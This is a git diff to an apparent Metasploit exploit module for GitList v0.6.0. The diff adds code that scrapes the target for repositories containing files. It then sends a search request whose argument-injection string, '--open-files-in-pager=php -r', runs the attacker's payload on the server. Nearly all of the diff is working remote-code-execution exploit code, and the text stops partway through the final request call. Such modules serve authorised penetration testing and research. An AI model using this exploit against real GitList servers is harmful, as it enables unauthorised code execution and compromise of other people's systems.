diff --git a/modules/exploits/multi/http/gitlist_arg_injection.rb b/modules/exploits/multi/http/gitlist_arg_injection.rb index 1792d8f371..77fc5b3d7c 100644 --- a/modules/exploits/multi/http/gitlist_arg_injection.rb +++ b/modules/exploits/multi/http/gitlist_arg_injection.rb @@ -35,13 +35,19 @@ class MetasploitModule < Msf::Exploit::Remote [ 'GitList v0.6.0', { } ] ], 'Privileged' => false, - 'Payload' => { 'BadChars' => '\'"' }, + 'Payload' => { 'BadChars' => '\'' }, 'DisclosureDate' => "Apr 26 2018", 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'Default path to GitList', '/']) + ]) + end def check - uri = normalize_uri(target_uri.path, '/gitlist/') + uri = normalize_uri(target_uri.path) res = send_request_cgi( 'method' => 'GET', 'uri' => uri @@ -54,11 +60,42 @@ class MetasploitModule < Msf::Exploit::Remote Exploit::CheckCode::Safe end + def get_repo + repo_res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + ) + + if repo_res && repo_res.code == 200 + repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten + fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty? + return repos.detect{ |r| r if has_files?(r) } + else + fail_with(Failure::Unreachable, "Could not access GitList") + end + end + + def has_files?(repo) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, repo, '/') + ) + if res && res.code == 200 + print_good("Successfully accessed repo #{repo}") + return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty? + + return true + else + fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo") + end + end + def exploit - postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search') - cmd = '--open-files-in-pager=php -r "eval(\\"' - cmd << payload.encoded - cmd << '\\");"' + repo = get_repo + fail_with(Failure::Unreachable, "No files found in repos") if repo.nil? + + postUri = normalize_uri(target_uri.path, repo << '/tree/c/search') + cmd = "--open-files-in-pager=php -r '#{payload.encoded}'" send_request_cgi( 'method' => 'POST', 'uri' => postUri,